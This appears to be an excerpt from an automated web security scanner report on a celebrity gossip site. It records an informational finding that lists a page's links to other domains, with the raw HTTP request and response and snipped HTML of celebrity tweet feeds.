<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: Yes! Lol RT <a href="http://twitter.com/AshNHartz">@AshNHartz</a>: <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a> Are you & <a href="http://twitter.com/biermann71">@biermann71</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31716672863731714">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: I was 3 months in this pic RT <a href="http://twitter.com/Please_Stand_By">@Please_Stand_By</a>: <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a> This is you recently pregnant? <a href="http://twitpic.com/3uqhh4">http://twitpic.com/3uqhh4</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31716118221561856">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/8376_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/BowWow">BowWow</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/BowWow/statuses/31716032452231168">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31712954776821760">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: Yes! Opening for a Huge mega star! I'm beyond excited! RT <a href="http://twitter.com/iutrav">@iutrav</a>: <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31712647732797440">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: Ur a doll! RT <a href="http://twitter.com/JoshGottlieb">@JoshGottlieb</a>: Fun day! Thank you <a href="http://twitter.com/BrielleZolciak">@BrielleZolciak</a>, <a href="http://twitter.com/arianazolciak">@arianazolciak</a> <a href="http://twitter.com/biermann71">@biermann71</a> and <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31712300427644928">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: RT <a href="http://twitter.com/AtlantaPlaces">@AtlantaPlaces</a>: Club Life is buzzing again: <a href="http://sch.mp/0jHde">http://sch.mp/0jHde</a> - RT <a href="http://twitter.com/KingLj11">@KingLj11</a> Me and <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a> @ club Life!! <a href="http://twitpic.com/3uqhh4">http://twitpic.com/3uqhh4</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31711564050472961">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/23936_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Jillzarin">Jillzarin</a>: On plane wish i could call in!RT <a href="http://twitter.com/lxnewyork">@lxnewyork</a> Getting ready to chat with our favorite sunday morning show <a href="http://twitter.com/lxtvopenho">@lxtvopenho</a>... <a href="http://tl.gd/8g30qb">http://tl.gd/8g30qb</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Jillzarin/statuses/31705598416392194">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/23936_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Jillzarin">Jillzarin</a>: So happy. Flying <a href="http://twitter.com/continental">@continental</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Jillzarin/statuses/31705092302315520">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4884_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/davenavarro6767">davenavarro6767</a>: <a href="http://twitter.com/Banshee_Song">@Banshee_Song</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/davenavarro6767/statuses/31690324585742336">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4884_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/davenavarro6767">davenavarro6767</a>: <a href="http://twitter.com/buddyhead">@buddyhead</a> <a href="http://youtu.be/fX_120DMFDQ">http://youtu.be/fX_120DMFDQ</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/davenavarro6767/statuses/31688081048342528">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4884_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/davenavarro6767">davenavarro6767</a>: <a href="http://twitter.com/ipierce89">@ipierce89</a> Oh no! Yur not DRIVING <a href="http://twitter.com/OMGitsjessielee">@OMGitsjessielee</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/davenavarro6767/statuses/31674584327528449">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4483_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/joshgroban">joshgroban</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/joshgroban/statuses/31672009905672192">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4483_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/joshgroban">joshgroban</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/joshgroban/statuses/31671556916645888">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/44221_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/rzrachelzoe">rzrachelzoe</a>: RT <a href="http://twitter.com/prabalgurung">@prabalgurung</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/rzrachelzoe/statuses/31667825831579649">Twitter</a>
...[SNIP]...
<li><a href="http://www.delish.com/recipes/cooking-recipes/tailgating-football-recipes?ocid=xnetr1-3">Tailgating time: 10 winning recipes</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/watch/video/celebrity-gridiron-fans/ufd8pil8?q=Football+Fan&rel=msn&from=en-us_msnhp&form=MSNXNM&ocid=xnetr1-5">Bing video: Celebrity gridiron fans</a>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com" >BLTWY</a>
...[SNIP]...
<li class="hasMenu" id="hasMenu2"><a href="http://msn.foxsports.com/" class="hasMenuLink">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb" >MLB</a></li><li><a href="http://msn.foxsports.com/nascar " >NASCAR</a></li><li><a href="http://msn.foxsports.com/nba" >NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball" >NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb" >NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl" >NFL</a></li><li><a href="http://msn.foxsports.com/nhl" >NHL</a></li><li><a href="http://msn.foxsports.com/fantasy" >Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer" >Soccer</a></li><li class="last"><a href="http://msn.foxsports.com/video?from=en-us_msnhp" >Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" >Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/" > Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " > Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" >Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" >Video</a>
...[SNIP]...
<li class="last"><a href="http://insidemsn.wordpress.com" >Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/" >White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/" >Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2" >Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " >Travel</a>
...[SNIP]...
<li class="bingLink last"><a href="http://www.bing.com/search?FORM=CWWWBQ" >Bing</a>
...[SNIP]...
<li><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_blank" class="pass">MSN Privacy</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/Entertainment.aspx" onclick="window.open(this.href,'help','width=960,height=720,resizeable=yes,status=no,titlebar=no,toolbar=no'); return false;" class="ignore" target="blank">Help</a>
...[SNIP]...
</p><a href="http://microsoft.com" >Microsoft</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

22.364. http://wonderwall.redacted/tv/jaime-pressly-files-for-divorce-1594033.story previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wonderwall.redacted
Path:	/tv/jaime-pressly-files-for-divorce-1594033.story

Issue detail

The page was loaded from a URL containing a query string:

http://wonderwall.redacted/tv/jaime-pressly-files-for-divorce-1594033.story?gt1=28135

The response contains the following links to other domains:

http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js
http://bit.ly/e3toNb
http://cdn.usmagazine.com/moviestvmusic/photos/mugshots-of-the-year-20102212
http://del.icio.us/post?title=Jaime+Pressly+Files+For+Divorce&url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fjaime-pressly-files-for-divorce-1594033.story
http://digg.com/submit?phase=2title=Jaime+Pressly+Files+For+Divorce&url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fjaime-pressly-files-for-divorce-1594033.story
http://download.live.com/?sku=messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://insidemsn.wordpress.com/
http://microsoft.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/Entertainment.aspx
http://platform.twitter.com/widgets.js
http://reddit.com/submit?title=Jaime+Pressly+Files+For+Divorce&url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fjaime-pressly-files-for-divorce-1594033.story
http://static.wonderwall.com/cache/css/1285028347/aXBhZC5jc3M..css
http://static.wonderwall.com/cache/css/1296066112/Z2FsbGVyeS5jc3M7Z2FsbGVyeS1zaXRlLmNzcztzdG9yeS5jc3M7c3Rvcnktc2l0ZS5jc3M7dG9wU3Rvcmllcy5jc3M7dG9wU3Rvcmllcy1zaXRlLmNzcztjYXRlZ29yeS5jc3M7Y2F0ZWdvcnktc2l0ZS5jc3M7dmlkZW8uY3NzO3ZpZGVvLXNpdGUuY3NzO3ZpZGVvQ2hhbm5lbHMuY3NzO2NlbGVicml0aWVzLmNzcztjZWxlYnJpdGllcy1zaXRlLmNzcztjZWxlYnJpdHkuY3NzO2NlbGVicml0eS1zaXRlLmNzcztodWIuY3NzO2h1Yi1zaXRlLmNzcztzaXRlU2VhcmNoLmNzcztzaXRlU2VhcmNoLXNpdGUuY3NzO2dlbmVyaWMuY3NzO2dlbmVyaWMtc2l0ZS5jc3M7Z2FtZS5jc3M7Z2FtZS1zaXRlLmNzcztzcGVjaWFsLmNzcztzcGVjaWFsLXNpdGUuY3Nz.css
http://static.wonderwall.com/cache/css/1296066112/Zm9udHMuY3NzO2ZvbnRzLXNpdGUuY3NzO3NpdGUuY3NzO2hlYWRlci5jc3M7bXNuSGVhZGVyLmNzcztiaW5nU2VhcmNoLmNzcztidXp6U3RyZWFtLmNzcztidXp6U3RyZWFtLXNpdGUuY3NzO3dhbGwuY3NzO3BjLmNzcztwYy1zaXRlLmNzcztuZXdzU3RyaXAuY3NzO2Zvb3Rlci5jc3M7cGFnaW5hdGlvbi5jc3M7dml0YWxpdHkuY3NzO2VtYmVkZGVkU2VhcmNoLmNzczt2b3RlLmNzcztyYXRpbmcuY3NzO21vcmVUaXRsZXMuY3NzO2V2ZXJ5dGhpbmcuY3NzO2NvbW1lbnRzLmNzcztjb21tZW50cy1zaXRlLmNzcztjcm9zc1Byb21vLmNzcztzaGFyZS5jc3M7c2hhcmUtc2l0ZS5jc3M7ZnJhbmNoaXNlTGlzdC5jc3M7ZmJTdHJpcGUuY3Nz.css
http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif
http://static.wonderwall.com/photos/Module1x1/1226_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/15124_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/15298_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/15856_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/15894_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/18487_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/25615_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/27217_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/32972_Module1x1_634164434770437095.jpg
http://static.wonderwall.com/photos/Module1x1/41323_Module1x1_634261162153428902.jpg
http://static.wonderwall.com/photos/Module1x1/43716_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/7475_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/7477_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/7503_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/7877_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/7895_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/8376_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/9389_Module1x1.jpg
http://static.wonderwall.com/photos/Original/43716_Original.jpg
http://tl.gd/8fkbn3
http://twitpic.com/3kde2c
http://twitpic.com/3umrxp
http://twitter.com/2RQ
http://twitter.com/AIDSPolicyProj
http://twitter.com/AubreyODay
http://twitter.com/AubreyODay/statuses/31475592251580417
http://twitter.com/AubreyODay/statuses/31478843529232385
http://twitter.com/BowWow
http://twitter.com/BowWow/statuses/31481112115019776
http://twitter.com/BrianLynch
http://twitter.com/CarlaDiBello
http://twitter.com/DJPaulyD
http://twitter.com/DJPaulyD/statuses/31480933047603200
http://twitter.com/KimKardashian
http://twitter.com/KimKardashian/statuses/31468288559030272
http://twitter.com/KimKardashian/statuses/31468574493114368
http://twitter.com/LoBosworth
http://twitter.com/LoBosworth/statuses/31474891412738048
http://twitter.com/MirandaBuzz
http://twitter.com/MirandaBuzz/statuses/31469606199623680
http://twitter.com/PaulaAbdul
http://twitter.com/PerezHilton
http://twitter.com/PerezHilton/statuses/31481637023784960
http://twitter.com/PeterGriffinn
http://twitter.com/Punch800
http://twitter.com/RicardoFenty
http://twitter.com/SarahKSilverman
http://twitter.com/SarahKSilverman/statuses/31469730384580608
http://twitter.com/StevenGParry
http://twitter.com/__shelovesB
http://twitter.com/ashleeRocs
http://twitter.com/avoyermagyan
http://twitter.com/barbara230
http://twitter.com/csiriano
http://twitter.com/csiriano/statuses/31485259056943104
http://twitter.com/dovetailchicago
http://twitter.com/emmarosekenney
http://twitter.com/emmyrossum
http://twitter.com/emmyrossum/statuses/31490256649850880
http://twitter.com/iamdiddy
http://twitter.com/iamdiddy/statuses/31469852891807744
http://twitter.com/izzy_kardashian
http://twitter.com/kurumiuchino
http://twitter.com/llcoolj
http://twitter.com/llcoolj/statuses/31477242445959168
http://twitter.com/mccordalex
http://twitter.com/mccordalex/statuses/31471195719208960
http://twitter.com/michaelianblack
http://twitter.com/michaelianblack/statuses/31488824462811136
http://twitter.com/michaelianblack/statuses/31490865776037888
http://twitter.com/racheljosephf
http://twitter.com/rainnwilson
http://twitter.com/rainnwilson/statuses/31475437494345729
http://twitter.com/rihanna
http://twitter.com/rihanna/statuses/31482886624378880
http://twitter.com/rihanna/statuses/31484086254051328
http://twitter.com/rihanna/statuses/31485881311297536
http://twitter.com/samantharonson
http://twitter.com/samantharonson/statuses/31473844573179904
http://twitter.com/samantharonson/statuses/31473906485297152
http://twitter.com/samantharonson/statuses/31474068645478400
http://twitter.com/samantharonson/statuses/31474364587180033
http://twitter.com/share?original_referer=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fjaime-pressly-files-for-divorce-1594033.story%3Focid%3Dtwtr-utweet
http://twitter.com/traverrains
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?FORM=CWWWBQ
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bing.com/videos/watch/video/celebrity-gridiron-fans/ufd8pil8?q=Football+Fan&rel=msn&from=en-us_msnhp&form=MSNXNM&ocid=xnetr1-5
http://www.bltwy.com/
http://www.delish.com/
http://www.delish.com/recipes/cooking-recipes/tailgating-football-recipes?ocid=xnetr1-3
http://www.mixx.com/submit?page_url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fjaime-pressly-files-for-divorce-1594033.story
http://www.myspace.com/Modules/PostTo/Pages/?l=3t=Jaime+Pressly+Files+For+Divorce&u=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fjaime-pressly-files-for-divorce-1594033.story
http://www.usmagazine.com/healthylifestyle/photos/2010s-biggest-splits-2010112
http://www.usmagazine.com/stylebeauty/photos/weddings-of-the-year-2009-20091012/5623
http://yfrog.com/hsi3mlfj
http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js
https://favorites.live.com/quickadd.aspx?url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fjaime-pressly-files-for-divorce-1594033.story
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /tv/jaime-pressly-files-for-divorce-1594033.story?gt1=28135 HTTP/1.1
Host: wonderwall.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 23:51:53 GMT
Expires:
Pragma:
Cache-Control: public
Cache-Control: max-age=300
Vary: Accept-Encoding
Content-Type: text/html
X-Cache-Lookup: HIT from localhost:8080
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if lt IE 7]> <html class="ie ie6 lte9 lte8 lte7" xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<meta name="Search.Image" content="http://static.wonderwall.com/photos/Module1x1/43716_Module1x1.jpg" />
<link rel="image_src" href="http://static.wonderwall.com/photos/Module1x1/43716_Module1x1.jpg" />

<meta property="fb:app_id" content="111376106992" />
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js"></script>
...[SNIP]...
</script>
<script src="http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js" type="text/javascript"></script>
...[SNIP]...
</script>

<link rel="stylesheet" type="text/css" href="http://static.wonderwall.com/cache/css/1296066112/Zm9udHMuY3NzO2ZvbnRzLXNpdGUuY3NzO3NpdGUuY3NzO2hlYWRlci5jc3M7bXNuSGVhZGVyLmNzcztiaW5nU2VhcmNoLmNzcztidXp6U3RyZWFtLmNzcztidXp6U3RyZWFtLXNpdGUuY3NzO3dhbGwuY3NzO3BjLmNzcztwYy1zaXRlLmNzcztuZXdzU3RyaXAuY3NzO2Zvb3Rlci5jc3M7cGFnaW5hdGlvbi5jc3M7dml0YWxpdHkuY3NzO2VtYmVkZGVkU2VhcmNoLmNzczt2b3RlLmNzcztyYXRpbmcuY3NzO21vcmVUaXRsZXMuY3NzO2V2ZXJ5dGhpbmcuY3NzO2NvbW1lbnRzLmNzcztjb21tZW50cy1zaXRlLmNzcztjcm9zc1Byb21vLmNzcztzaGFyZS5jc3M7c2hhcmUtc2l0ZS5jc3M7ZnJhbmNoaXNlTGlzdC5jc3M7ZmJTdHJpcGUuY3Nz.css" />
<link rel="stylesheet" type="text/css" href="http://static.wonderwall.com/cache/css/1296066112/Z2FsbGVyeS5jc3M7Z2FsbGVyeS1zaXRlLmNzcztzdG9yeS5jc3M7c3Rvcnktc2l0ZS5jc3M7dG9wU3Rvcmllcy5jc3M7dG9wU3Rvcmllcy1zaXRlLmNzcztjYXRlZ29yeS5jc3M7Y2F0ZWdvcnktc2l0ZS5jc3M7dmlkZW8uY3NzO3ZpZGVvLXNpdGUuY3NzO3ZpZGVvQ2hhbm5lbHMuY3NzO2NlbGVicml0aWVzLmNzcztjZWxlYnJpdGllcy1zaXRlLmNzcztjZWxlYnJpdHkuY3NzO2NlbGVicml0eS1zaXRlLmNzcztodWIuY3NzO2h1Yi1zaXRlLmNzcztzaXRlU2VhcmNoLmNzcztzaXRlU2VhcmNoLXNpdGUuY3NzO2dlbmVyaWMuY3NzO2dlbmVyaWMtc2l0ZS5jc3M7Z2FtZS5jc3M7Z2FtZS1zaXRlLmNzcztzcGVjaWFsLmNzcztzcGVjaWFsLXNpdGUuY3Nz.css" />
<link rel="stylesheet" media="only screen and (max-device-width: 480px)" href="http://static.wonderwall.com/cache/css/1285028347/aXBhZC5jc3M..css" />
<link rel="stylesheet" media="only screen and (min-device-width: 481px) and (max-device-width: 1024px)" href="http://static.wonderwall.com/cache/css/1285028347/aXBhZC5jc3M..css" />
</head>
...[SNIP]...
<span><img src="http://static.wonderwall.com/photos/Original/43716_Original.jpg" class="imgSrc-http://static.wonderwall.com/photos/Original/43716_Original.jpg" alt="" /></span>
...[SNIP]...
<span><img src="http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif" class="imgSrc-http://static.wonderwall.com/photos/Original/43714_Original.jpg" alt="" /></span>
...[SNIP]...
<span><img src="http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif" class="imgSrc-http://static.wonderwall.com/photos/Original/11742_Original.jpg" alt="" /></span>
...[SNIP]...
<span><img src="http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif" class="imgSrc-http://static.wonderwall.com/photos/Original/44867_Original.jpg" alt="" /></span>
...[SNIP]...
<span><img src="http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif" class="imgSrc-http://static.wonderwall.com/photos/Original/31223_Original.jpg" alt="" /></span>
...[SNIP]...
<span><img src="http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif" class="imgSrc-http://static.wonderwall.com/photos/Original/43563_Original.jpg" alt="/" /></span>
...[SNIP]...
<li class="shareItem shareItem-twitter"><a href="http://twitter.com/share?original_referer=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fjaime-pressly-files-for-divorce-1594033.story%3Focid%3Dtwtr-utweet" class="twitterProxy"></a>
...[SNIP]...
<li class="shareItem shareItem-windowsLive first"><a href="https://favorites.live.com/quickadd.aspx?url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fjaime-pressly-files-for-divorce-1594033.story" target="_blank">Windows Live</a>
...[SNIP]...
<li class="shareItem shareItem-delicious"><a href="http://del.icio.us/post?title=Jaime+Pressly+Files+For+Divorce&url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fjaime-pressly-files-for-divorce-1594033.story" target="_blank">Delicious</a></li><li class="shareItem shareItem-myspace"><a href="http://www.myspace.com/Modules/PostTo/Pages/?l=3t=Jaime+Pressly+Files+For+Divorce&u=http%3A%2F%2Fwonderwall.msn.com%2Ftv%2Fjaime-pressly-files-for-divorce-1594033.story" target="_blank">MySpace</a></li><li class="shareItem shareItem-digg"><a href="http://digg.com/submit?phase=2title=Jaime+Pressly+Files+For+Divorce&url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fjaime-pressly-files-for-divorce-1594033.story" target="_blank">Digg</a></li><li class="shareItem shareItem-mixx"><a href="http://www.mixx.com/submit?page_url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fjaime-pressly-files-for-divorce-1594033.story" target="_blank">Mixx</a></li><li class="shareItem shareItem-reddit last"><a href="http://reddit.com/submit?title=Jaime+Pressly+Files+For+Divorce&url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fjaime-pressly-files-for-divorce-1594033.story" target="_blank">Reddit</a>
...[SNIP]...
<P ALIGN="LEFT"><A HREF="http://www.usmagazine.com/healthylifestyle/photos/2010s-biggest-splits-2010112" TARGET="_blank">PHOTOS: See what other stars have called it quits</A>
...[SNIP]...
<P ALIGN="LEFT"><A HREF="http://cdn.usmagazine.com/moviestvmusic/photos/mugshots-of-the-year-20102212" TARGET="_blank">PHOTOS: Check out these celebrity mugshots</A>
...[SNIP]...
<P ALIGN="LEFT"><A HREF="http://www.usmagazine.com/stylebeauty/photos/weddings-of-the-year-2009-20091012/5623" TARGET="_blank">PHOTOS: Jaime and Simran's personal wedding pic</A>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/15894_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/michaelianblack">michaelianblack</a>: <a href="http://twitter.com/BrianLynch">@BrianLynch</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/michaelianblack/statuses/31490865776037888">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/41323_Module1x1_634261162153428902.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/emmyrossum">emmyrossum</a>: Day off today, <a href="http://twitter.com/emmarosekenney">@emmarosekenney</a> and I hit up <a href="http://twitter.com/dovetailchicago">@dovetailchicago</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/emmyrossum/statuses/31490256649850880">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/15894_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/michaelianblack">michaelianblack</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/michaelianblack/statuses/31488824462811136">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/27217_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/rihanna">rihanna</a>: <a href="http://twitter.com/__shelovesB">@__shelovesB</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/rihanna/statuses/31485881311297536">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/15298_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/csiriano">csiriano</a>: Important! Various ticket websites are selling fake tickets to my fashion show. I wish everyone who wanted to (cont) <a href="http://tl.gd/8fkbn3">http://tl.gd/8fkbn3</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/csiriano/statuses/31485259056943104">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/27217_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/rihanna">rihanna</a>: #puppyNAVY ? RT <a href="http://twitter.com/RicardoFenty">@RicardoFenty</a>: #DogNavy <a href="http://twitpic.com/3kde2c">http://twitpic.com/3kde2c</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/rihanna/statuses/31484086254051328">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/27217_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/rihanna">rihanna</a>: <a href="http://twitter.com/StevenGParry">@StevenGParry</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/rihanna/statuses/31482886624378880">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/9389_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/PerezHilton">PerezHilton</a>: <a href="http://twitter.com/PaulaAbdul">@PaulaAbdul</a>
...[SNIP]...
